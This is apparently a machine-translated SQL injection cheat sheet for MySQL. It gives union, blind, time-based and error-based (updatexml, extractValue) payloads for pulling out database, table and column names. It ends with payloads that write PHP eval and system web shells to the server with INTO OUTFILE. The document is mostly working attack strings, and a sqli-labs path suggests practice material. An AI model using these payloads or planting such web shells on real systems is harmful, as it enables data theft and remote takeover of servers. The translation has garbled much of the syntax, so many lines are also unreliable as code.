/ *
* GET, POST
* have to return
*
* /
SQL injection given on
an acquired number of fields
'. 5 by Order - +
2, the table name acquired
0' Union SELECT 1, GROUP_CONCAT (table_name), from information_schema.tables. 3 = WHERE TABLE_SCHEMA Database () - +
SELECT GROUP_CONCAT ( table_name) from information_schema.tables WHERE TABLE_SCHEMA = Database ()
. 3, obtain field
0 'SELECT Union. 1, GROUP_CONCAT (column_name), from from information_schema.columns. 3 WHERE table_name =' Users' - +
SELECT GROUP_CONCAT (column_name) form from information_schema.columns = table_name WHERE 'Users'
/ *
* the GET, POST
* no return, no error,
* /
Blinds, usually following methods guess string.
'And length (Database ()). 8 = - +
' and ASCII (substr (Database (), 1,1))> N - +
'and ASCII ( substr (Database (), 1,1)) = N - +
'and ASCII (substr (Database (), 1,1)) <N - +
// time-based blind, and often combined with Boolean blind
case // on the page, whether correct or not, without any prompting, use
'and if (length (database ( )) = 8, sleep ( 3), null) - + // correctly executed SLEEP
'and IF (length (Database ()) = 8,1, SLEEP (. 3)) - + // not performed correctly SLEEP
' or IF ( length (database ()) = 8 , sleep (3), null) or '1' = '1
/ *
* GET, POST
* no return, there is an error,
* for select, insert, update, delete statements injection
* /
updatexml () error injection
UPDATEXML (XML_document, XPath_string, new_value) ;?
first argument: XML_document is String format, the name of the XML document object, the paper is Doc?
The second argument: XPath_string (Xpath format string) without understanding Xpath syntax, you can find tutorials online. ?
The third parameter:? New_value, String format, replacing the data to find qualified
payload:
// query the current version of MySQL
'and updatexml (1, concat ( 0x7e, (select @@ version)), 1) or' 1 '=' 1
'or updatexml (1, concat (0x7E, (the SELECT @@ Version), 0x7E), 1) or'
// query the current database name
'and updatexml (1, concat ( 0x7e, (select database () , 0x7E), 1) or '1' = '1
// lookup table name (currently) in the database
' and updatexml (1, concat ( 0x7e, (select group_concat (table_name) from information_schema.tables where table_schema = database () ), 0x7E),. 1) or '. 1' = '. 1
// query field name (users table)
'and updatexml(1,concat(0x7e,(select group_concat(column_name) form information_schema.columns where table_name='users'),0x7e),1) or '1'='1
Under given based INSERT / Update
'or The updatexml (. 1, the concat (0x7E, (SELECT @@ Version), 0x7E),. 1) or'
based on an error in the Delete
'or The updatexml (. 1, the concat (0x7E, (SELECT @@ Version), 0x7E),. 1)
extractValue ()
/ * # is a single line comment
* updatexml with no difference
* /
'and extractValue (. 1, the concat (0x7E, (SELECT @@ Version))) #
/ *
* Sentence Trojans
* /
PHP: <?? PHP @eval ($ _ GET [ 'String'])>
// sql injection vulnerability of reading and writing files
// write the file path is a relative path, where the file is written to the default database folder
1111111'union select 1,2, "<? php @eval ($ _ GET [ 'string' ?])> "iNTO outfile" 1.php "- +
// can also be written as absolute path, the path here is the Windows
1111111'union select 1,2," <php @eval ($ _ GET [ 'string'? ?])> "INTO outfile" D: \\ \\ web_security 1.php "- +
? 1111111'union SELECT 1,2," <PHP System (the GET $ _ [ 'cmd'])> "INTO outfile"? D: \\ \\ web_security 1.php "- +
// relative path of the wording
-14 'union select 1,2," < php system ($ _ GET? [' cmd '])?> "into outfile". ./../www/sqli/Less-1/2.php "- +